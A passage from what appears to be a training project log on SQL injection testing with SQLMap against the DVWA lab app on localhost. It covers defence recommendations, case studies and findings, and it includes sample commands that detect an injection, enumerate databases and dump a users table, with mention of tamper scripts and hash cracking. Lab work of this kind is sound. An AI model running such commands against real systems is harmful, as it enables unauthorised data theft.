   A WAF can detect and block attack patterns, stopping SQL injection attempts before they reach the application.

---

### Real-World SQL Injection Case Studies

1. **Sony Pictures (2011)**  
   Hackers exploited an SQL Injection vulnerability to access application databases, leaking millions of customer records.  
   Sony addressed the issue by rewriting insecure queries, applying input sanitization, and strengthening firewall filtering.

2. **Heartland Payment Systems (2008)**  
   Attackers used SQL Injection to breach database servers containing sensitive payment data.  
   They fixed it by improving application-level protections, upgrading systems, and conducting regular vulnerability audits.

These case studies show that even large organizations are not immune to SQL Injection attacks when proper validation and security standards are ignored.

---

### Tools for SQL Injection Prevention and Testing

1. **Burp Suite** – A professional tool that helps identify SQL Injection flaws by intercepting, modifying, and replaying web traffic to see how servers respond.  
2. **OWASP ZAP** – An open-source security scanner used to detect injection vulnerabilities automatically in web applications.  
3. **Acunetix** – A commercial vulnerability scanner capable of running full security scans, including SQL Injection tests, across entire web applications.

These tools help developers and testers find and fix issues early before hackers exploit them.

---

### Company Training Rules to Prevent SQL Injection

1. All developers must enforce parameterized queries and use prepared statements in every function that interacts with a database.  
2. Employees handling web development or IT operations must be trained to distrust external input and validate all user data before processing.  
3. Conduct annual SQL Injection awareness sessions to keep staff updated on the latest best practices and attack techniques.  
4. Ensure all new code commits undergo code review and automated vulnerability scanning before merging into production.

---

### Summary Statement

If all web applications follow these security principles, attackers will not be able to use SQL Injection to compromise data or systems. These precautions protect customers, preserve brand reputation, and maintain application trustworthiness.

---

### Day 13 Final Report Statement

Day 13 work has been completed. SQL Injection defense strategies, real-world examples, prevention tools, and company training guidelines have been researched, explained, and recorded fully in the project Jupyter notebook.  
This marks the completion of the recommendations and policy documentation stage for the project.


# Day 14 – Final Project Report and Methodology Summary

### Objective:
To create and finalize a complete project report summarizing all SQLMap testing on the DVWA platform, including step-by-step methodology, key findings, recommendations, sample commands, and learning reflections.

---

### Project Methodology

Each day of the project followed a structured workflow to simulate real-world web security testing:
- **Day 1–2:** Environment setup using DVWA on a local web server and configuration verification.
- **Day 3–4:** Initiated SQLMap tests on DVWA SQL Injection modules, identifying injection points and databases.
- **Day 5–6:** Extracted data from `users` and `guestbook` tables and analyzed different SQL injection methods.
- **Day 7–10:** Bypassed validations using tamper scripts such as `space2comment`, `between`, and `charunicodeencode`.  
  Tested increasing DVWA security levels (Low, Medium, High).
- **Day 11–12:** Conducted database enumeration and manual testing for secure configurations and XSS flaws.
- **Day 13:** Compiled SQL Injection mitigation measures and defense best practices.
- **Day 14:** Organized all project data, completed documentation, and validated completeness of evidence.

---

### Results and Findings

- SQL Injection vulnerabilities were successfully exploited in **Low** and **Medium** DVWA security modes using SQLMap.
- Extracted databases: `dvwa` and `information_schema`.  
  Tables found: `users`, `guestbook`.
- Dumped user credentials and verified password hashes cracked by SQLMap’s built-in hash-cracker.
- High security mode resisted all SQLMap injections and tamper scripts.  
  No injectable parameters were detected beyond level 5 scanning.
- Conducted complementary XSS tests (DOM, Stored, and Reflected), confirming proper sanitization at higher security settings.

All technical logs, commands, and screenshots were saved in the reporting notebook for verification.

---

### Defense Recommendations (Summary from Day 13)

To defend against SQL Injection attacks:
1. Use **prepared statements and parameterized queries** for all user input.  
2. Validate and sanitize all incoming data before executing database queries.  
3. Limit database permissions by role and function to prevent full data access.  
4. Keep all web, framework, and database software updated regularly.  
5. Deploy a **Web Application Firewall** (WAF) for real-time threat detection.  
6. Conduct frequent developer training to ensure secure programming practices.

---

### Evidence Checklist

- [x] All SQLMap test results and outputs are included in the project notebook.  
- [x] Screenshots from DVWA app and SQLMap sessions have been saved.  
- [x] Batch scripts, logs, and tamper script results are stored and referenced.  
- [x] SQLMap command documentation and findings are complete for each test.  
- [x] Security analysis and comparison charts between DVWA security levels documented.

---

### Sample SQLMap Commands and Outputs

**1. Basic SQL Injection detection**
sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --batch

Detects and checks if parameter `id` is vulnerable to SQL Injection.

**2. List databases**
sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit" --dbs

Enumerates databases available on the target web application.

**3. Dump table data**
sqlmap -u "http://127.0.0.1:8080/vulnerabilities/sqli/?id=1&Submit=Submit" -D dvwa -T users --dump

Extracts full data from the `users` table within the `dvwa` database.

---

### Summary Statement

This project demonstrated both the ease and danger of exploiting SQL Injection vulnerabilities with automated tools like SQLMap.  
Low and Medium DVWA security levels were vulnerable, while High security effectively blocked all injection attempts.  
Testing highlighted how parameterized queries, proper validation, and modern defense mechanisms protect applications from exploitation.

---

### Project Reflection

Completing this SQLMap project provided hands-on experience in identifying, exploiting, and securing web applications.  
The testing process improved understanding of how hackers use SQL injections and how security engineers can prevent them.  
Future improvements can include testing additional web frameworks, using larger datasets, and integrating automated WAF tuning.


## Day 15 : Final Review and Project Completion  

### Completed Tasks and Explanation  
- Verified that every day (Day 1 – Day 14) report is complete with evidence.  
- Organized screenshots and outputs of SQLMap command runs.  
- Cross‑checked all defense recommendations and reflections.  
- Updated project header and metadata to match Skilogics format.  

### Task for Next Day  
This is the final submission stage – no new tasks. Submit project records for evaluation and feedback.  

### Project Risk  
- Risk of missing final screenshots or command outputs if not double‑checked.  
- Always keep a copy of the project notebook and all attached evidence files.  

### Completion Note  
This SQLMap Injection Analysis project is **completed successfully**.  
The study demonstrated how SQL injection attacks are performed and prevented using automated tools and secure coding techniques. All required documentation and evidence are attached in this final notebook.  
